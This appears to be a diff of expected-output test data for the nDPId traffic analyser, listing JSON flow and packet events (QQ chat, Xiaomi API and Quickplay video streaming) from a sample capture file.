{"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7580000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1429000110528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":262,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":262,"pkt_l4_len":226,"thread_ts_msec":1429000110528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPYrhEAArQaNjMvNk9cKNqn6AFCLVl6azfAZGFZbUBgIKKjyAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ4DQoNCoJfAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDMBQYGAIBAF7nY9ngjTY7+FL\/5+Nv5cQ=="} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7580000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1429000117728,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":638,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":638,"pkt_l4_len":602,"thread_ts_msec":1429000117728,"pkt":"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"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7580000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Xiaomi","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.account.xiaomi.com","url":"api.account.xiaomi.com\/pass\/v2\/safe\/user\/coreInfo?signature=u%2F73dEXBHbejev0ISNwnGyyfeTw%3D&userId=Mz5Xr5UXKuw83hxd6Yms2w%3D%3D","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 
+00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7580000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Xiaomi","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.account.xiaomi.com","url":"api.account.xiaomi.com\/pass\/v2\/safe\/user\/coreInfo?signature=u%2F73dEXBHbejev0ISNwnGyyfeTw%3D&userId=Mz5Xr5UXKuw83hxd6Yms2w%3D%3D","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 01505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1429000118045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":831,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":831,"pkt_l4_len":795,"thread_ts_msec":1429000118045,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAy+57kAArQaZmTazjEEKNqn6AFDcPeCiut6WGFOiUBgIJVI5AABIVFRQLzEuMSAyMDAgT0sNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQpEYXRlOiBUdWUsIDE0IEFwciAyMDE1IDA4OjI4OjM3IEdNVA0KU2VydmVyOiBUZW5naW5lLzIuMC4xDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb247Y2hhcnNldD11dGYtOA0KQ29udGVudC1MZW5ndGg6IDU1Ng0KDQofiwgAAAAAAAADBMHXokMwAADQD+pDVCuuR7VCzdrerESNxijK199zgLVnYggNE5ULioIZGP6CKSQ+J1Ue9LQPP\/PeL9xYw3Gkgs8aCeFd\/zZqCdqbSs4SDagv3Q8gbXJOLHNZZfmdTsJ6vPDYpe+\/rdailf+Vy4WCt5JCSfPLvLm\/VjBPjj45GMX6eUks60t+xxt21vhZm+cZaqa7DoZ7yob2ejBdIHAVjR1TTdJhFubG5KBya8nY0zzMWLsuzvCvt9glIynGQHg+BLRZzPC8ZTGPUyOvUh05
tiZ\/balrrwKQt2cEeJstEBP0D5BLZnKvY160w+\/OrxB+sjFauMt5dnHUcI3t7SoTqChgxCrhMkNhG6YVl2LK8pgjuYhqcDRox+KgQzOA\/hLmGzg3uirtssbFIVC5Aro3ACcGCwISGwb1VxWHonPvyWHNDlG81Bqq3QQetunNZnl6oz4rq\/ZHNPTVG61wMgLdvvo4GWhjgZ\/bnblrSFNGd7Mdr5MexXVx6SfeJVyvwBelPETxWHKKoRDa8ZjUvT0cEJOB7G\/G7e4ZZ\/83OAc7CIIAAEA\/iIulwzriBqhJkUE6bpVlTg1QY+rX1\/uCF5JNOyMtykH7DdhqEwaXY8s7mPz38wS8mngvjnR+4AS+bZOCqFuqMeaMn6SzJIMOPFhSp7GcsxUbtqiwMa7\/yvtnpf2t24H4WaAC+sVExSgCQaWyVTSeVY6vezz8ABeIl3WAAgAA"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1429000153937,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000153937,"pkt":"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"} 
-01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0048.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0048.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 02356{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1429000156273,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"thread_ts_msec":1429000156273,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaB3UUAArQYBdngcIygKNqn6AFDLMd3LpTQtNFxOUBAIItXfAAChEIrgrleYAhFa3F3938BggSrcIn+nqVX5sByKXTUtTZ+S0IwO\/hIwf0BB2uc3Bf5jC1QfzUHjRvDUIOnnsb5a0uxxhiIVAqWnEYC45w18yjCMLPuOKVZeOYgfCQVjYsxLAKkdXaRkmMu4Zoel0HztrVYR1cnta\/vSYGQ0WkMhgl3KFYUm\/X4qjjWEdowcfDAWr\/FWJBR4jsXSxR8EQOd7RYpfWOl0YqAXrcURgivoA\/Vazm9dSSQ6DzW0D1TNTghMrqCseZaLLp2diY5etWqcT5Lxxdnl2ino6PEahKmf04RjOZq83lwn5PEPti9QeNcfMNctSiHj28O5VeDtauVKLipzStAYJu6O1tMaMLByrHeLYYc5MbsLRR9vao6KZRnJE1AEzpmLa\/+YrNJZcLrW3joqQ2AvZzJNsHv1pr7090xMkT87olqCX5Yd5dgxMvv2CbBfzbv7iN0239xxLePmefbZXxmf1ljpyZUWt+YUi19f0cGaafC5roKKnRsDLjalFhQzNZMDN1+qROgcpPpFrfcPRzSCRX2oM3IXqFNyhnIqEBeoqjt\/rN0OghieSXA+J4\/fnibDY2oBF\/qPi7PmT7+EZQfp4dOU7LXGxwfkHyb\/+nSUhuDDHBPkRtLg+XO3xXfDG63CCzgP9j+ew7ylJL7s8zjEAnk0iP7KsAXK1fFcvUkB5LITD3qa1hjsRXNIyWIaxMkwR8GhlPLtf0hpPiS0Um8a1yduUSn4xM5n3AHwQrDyknL7fxErOcmIBqXcP2oyyyTV+m9b64iHrtRxBINGeYaff6lhmqnRqCvGC1F52Og\/seNDfW8RWv4yBXzQwblMI7xviVAgMjEyKmjtOXwyzWj0J+YuHjA3wXbbyRFf\/zujxfqXq0HOg5HobG69sZOgCtlNOxGxs6uNG3Nyl1bm6YuhORfGFVH4dDhxB4pM4mawqKQgNd3ZivrDKzWiLphhw89pFSEPmrYR+dSw4\/6dNuOLRnG16Am5LUzsom4k95ky9x\/PVPzeU+5ie6mhYp
gOrbjeFpz+rg+m9C+NB8SEBd6muVe4B37GCYUkUck7iEmhbPSKsrUqKYVveBJ0WJIstk9mKFzxlfKH3J2\/bjYqxEQYbmgG6oJ5ralnDKawN31PTuvOshsQceM7W53\/H7rfpivL6lr\/kjGpOhEd9Dxxlf9p+4v7nxfQAiorCo+Ipnx1Vx4\/M8DFoeolmxcpnpC1\/t87cEimWGKlQKNWBmqgBX3lF+jG0RumppZSWz\/aQfU6VQwCojXD7XsZoKlt0fqkAcQPgNbx4gtOwebSddbvGBn7uPBEFCe1qtOY1P6e8nyGK8y1LANkR3tsNsXJFvHkj5HBf+Fth6gbnan75B2fOeWrkdUU90lajYKwLL1LL5gxqWv1nPgRm5gG0V\/LUY3dCEIra5BI+d3CAtAPKtdluT\/JXWML4j3eAT74+s9ouu5yox25rXWvrCvhcuf5BYDjdzBBmrYB\/t4fb52bttXAQuL80qQnY5Oj1X5f+Um3rpgjwFtGj7n30bbQASEZTdFPUOe8kJs7mBkrIY6yotsjZG+hKNfMJZdhU8ZShuzC8djNjp9NuCLli+\/ugxOOk4+twmaL+UUbEqGDcxcAEBa5EyOAV7RfqezgWcaQ3dbJjWXdNWxetLCdQ7XanJt3eAkt933KoymlC4XmU95LAhWF33+FFwL3BYas4y5X8wDDUnULI8QtkzKEN2oLGgIewtkuDrW4wpL3EZsIKv86JV8UzFxUMaP2MiczrH7WqOOsj1ytSR\/mRWDeXJftrtXq0qR46GntPeDZXJQKpY9CB2cQr+2LnDbM8iBOGE8HrF8a0W0JfepPoC6ozHQ5CxM0HE7L3V4aaQ=="} 01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1429000156459,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000156459,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaip0AAPwZH9go2qfp4HCMoyzEAUC00XE7dy64AUBhgH5dQAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNDkudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 
-00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":112,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1429000052350,"flow_last_seen":1429000055158,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1429000184253,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":112,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1429000052350,"flow_last_seen":1429000055158,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1429000184253,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1429000207973,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000207973,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYfhkAAPwbLFwo2qfp4HCMoyzIAUDz1EP7kfsOCUBgByRv\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"} -01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0052.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
+01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0052.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1429000210014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":128,"pkt_l4_len":92,"thread_ts_msec":1429000210014,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHCiFUAArQbb4XgcIygKNqn6AFDLMuSI3uA89RK8UBgIIiZoAAA7o06lOUMR9b0tN4NqWqjYHmUkbAcezqY5k1Ckm0MtYSmllf\/mEyyNorAHBlAKlc3tlqWmVMYy6YLe45g7yxi7BP1GlteorxU="} 
01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1429000210215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000210215,"pkt":"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"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1429000237766,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000237766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYTSEAAPwbXVQo2qfp4HCMoyzMAUBi\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"} 
-01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0055.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0055.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 01271{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1429000239838,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":652,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":652,"pkt_l4_len":616,"thread_ts_msec":1429000239838,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAnwr2EAArAZRE3gcIygKNqn6AFDLM\/vq+JsYvwoZUBgIInF9AABzYj3YcVRlOp3c+LTFyFpK8hJq+9ow2Mvt7DtOuHGzxpnR+3r13CHw+E3iWLlq+exgWJJWm8EH8pTbwRe+x8\/D4xNXRBwksI9Csb4QsiJPsfT2+RDiLS02aidPx7uSbhK8jMvrBH5tHxdpa1MFSWCqjYPTrHUzNzOA9TY5FgYYDDMkEDm7gO5123w4n1MAhsXStfcoQ3nSRMywWBjQbHZWkL++gHWx\/\/bzYnpJ21s22WZTz+idJIBFeazv4DxMARlrjHvFswfnI5PHnRRlJ35I7r1qBSMNM3mL3d8eBq5Li+cUyPU9itxuknh7PGxS38quOs1TDTVg7FntfS3WF5atx9VBXKTp0aVWtu3ILXC6hNWU\/3GWggrR0a3pT3Hg6QnXTm4c911OZjeTJVo9BcqKuNrC54rvRTCDA32\/HDU6hjsWUORfbA\/u7H1kGeJSFG\/fOMyzkamr7WzvqgnibwnuBc0xZxB9tpVk0llxH2XWzC3EK3M6+lvnjFarcNCJ93EYtE6CK75PtO2Yi7ZSrr3mOwYlgtK8Yp0yb7vwqI\/2DSjngCc+Sn1445B4mHIXhp7fd7CP2bpJi3Gy6qjSlxiy6iOAVea4ViBsitRQkSJFsgN9tKobyQWEjA0Iq\/LCYaZ8fynI94mgU9gbtQkXI5Y7NPc0FmJseEdZ62w2m6qgfXo6nPxb2wkFc\/k2DVuvOgbbk\/FGlh+lWIZwut4KOX\/pap\/MEzShFHEPoHfax3dVeu1dix8C0CE3+qvmRiSOV8\/NDfdKpdkErPHZ3dWKhtrNlCDmPw=="} 
